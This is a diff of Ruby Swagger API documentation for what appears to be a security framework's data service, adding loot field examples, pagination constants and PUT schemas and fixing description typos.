+  # Some of the attributes expect different data when doing a create.
23
+  CREATE_PATH_DESC = 'The name to give the file on the server. All files are stored in a server configured path, so a full path is not needed. If there is a corresponding file on disk, the given value will be prepended with a unique string to prevent accidental overwrites of other files.'
24
+  CREATE_PATH_EXAMPLE = 'password_file.txt'
21 25
 
22 26
 # Swagger documentation for loot model
23 27
   swagger_schema :Loot do
@@ -28,7 +32,7 @@ module LootApiDoc
28 32
     property :service_id, type: :integer, format: :int32, description: SERVICE_ID_DESC
29 33
     property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE
30 34
     property :path, type: :string, description: PATH_DESC, example: PATH_EXAMPLE
31
-    property :data, type: :string, description: DATA_DESC
35
+    property :data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
32 36
     property :content_type, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
33 37
     property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE
34 38
     property :info, type: :string, description: INFO_DESC
@@ -87,8 +91,8 @@ module LootApiDoc
87 91
           property :host, type: :string, format: :ipv4, description: HOST_DESC, example: RootApiDoc::HOST_EXAMPLE
88 92
           property :service,  '$ref': :Service
89 93
           property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE, required: true
90
-          property :path, type: :string, description: PATH_DESC, example: PATH_EXAMPLE, required: true
91
-          property :data, type: :string, description: DATA_DESC
94
+          property :path, type: :string, description: CREATE_PATH_DESC, example: CREATE_PATH_EXAMPLE, required: true
95
+          property :data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
92 96
           property :ctype, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
93 97
           property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE, required: true
94 98
           property :info, type: :string, description: INFO_DESC
@@ -195,7 +199,7 @@ module LootApiDoc
195 199
 
196 200
     # Swagger documentation for /api/v1/loots/{id} PUT
197 201
     operation :put do
198
-      key :description, 'Update the attributes an existing loot.'
202
+      key :description, 'Update the attributes on an existing loot.'
199 203
       key :tags, [ 'loot' ]
200 204
 
201 205
       parameter :update_id
@@ -206,7 +210,14 @@ module LootApiDoc
206 210
         key :description, 'The updated attributes to overwrite to the loot.'
207 211
         key :required, true
208 212
         schema do
209
-          key :'$ref', :Loot
213
+          property :workspace, type: :string, required: true, description: RootApiDoc::WORKSPACE_POST_DESC, example: RootApiDoc::WORKSPACE_POST_EXAMPLE
214
+          property :host_id, type: :integer, format: :int32, description: HOST_ID_DESC
215
+          property :service_id, type: :integer, format: :int32, description: SERVICE_ID_DESC
216
+          property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE, required: true
217
+          property :path, type: :string, description: CREATE_PATH_DESC, example: CREATE_PATH_EXAMPLE, required: true
218
+          property :ctype, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
219
+          property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE, required: true
220
+          property :info, type: :string, description: INFO_DESC
210 221
         end
211 222
       end
212 223
 

+ 1
- 1
documentation/api/v1/note_api_doc.rb View File

@@ -184,7 +184,7 @@ module NoteApiDoc
184 184
 
185 185
     # Swagger documentation for /api/v1/notes/:id PUT
186 186
     operation :put do
187
-      key :description, 'Update the attributes an existing note.'
187
+      key :description, 'Update the attributes on an existing note.'
188 188
       key :tags, [ 'note' ]
189 189
 
190 190
       parameter :update_id

+ 9
- 0
documentation/api/v1/root_api_doc.rb View File

@@ -17,6 +17,15 @@ module RootApiDoc
17 17
   AUTH_CODE_DESC = 'The authentication error code that was generated.'
18 18
   AUTH_CODE_EXAMPLE = 401
19 19
   AUTH_MESSAGE_DESC = 'A message describing the authentication error that occurred.'
20
+  LIMIT_DEFAULT = 100
21
+  LIMIT_DESC = "The maximum number of results that will be retrieved from the query. (Default: #{LIMIT_DEFAULT})"
22
+  OFFSET_DEFAULT = 0
23
+  OFFSET_DESC = "The number of results the query will begin reading from the beginning of the set. (Default: #{OFFSET_DEFAULT})"
24
+  ORDER_DESC = 'The order in which results are returned, based on the created_at datetime. (Default: desc)'
25
+  ORDER_ENUM = [
26
+      'asc',
27
+      'desc'
28
+  ]
20 29
 
21 30
   DEFAULT_RESPONSE_200 = 'Successful operation.'
22 31
   DEFAULT_RESPONSE_401 = 'Authenticate to access this resource.'

+ 1
- 1
documentation/api/v1/service_api_doc.rb View File

@@ -187,7 +187,7 @@ module ServiceApiDoc
187 187
 
188 188
     # Swagger documentation for /api/v1/services/:id PUT
189 189
     operation :put do
190
-      key :description, 'Update the attributes an existing service.'
190
+      key :description, 'Update the attributes on an existing service.'
191 191
       key :tags, [ 'service' ]
192 192
 
193 193
       parameter :update_id

+ 1
- 1
documentation/api/v1/session_api_doc.rb View File

@@ -86,7 +86,7 @@ module SessionApiDoc
86 86
   end
87 87
 
88 88
   swagger_path '/api/v1/sessions/{id}' do
89
-    # Swagger documentation for api/v1/sessions/:id GET
89
+    # Swagger documentation for /api/v1/sessions/:id GET
90 90
     operation :get do
91 91
       key :description, 'Return a specific session that is stored in the database.'
92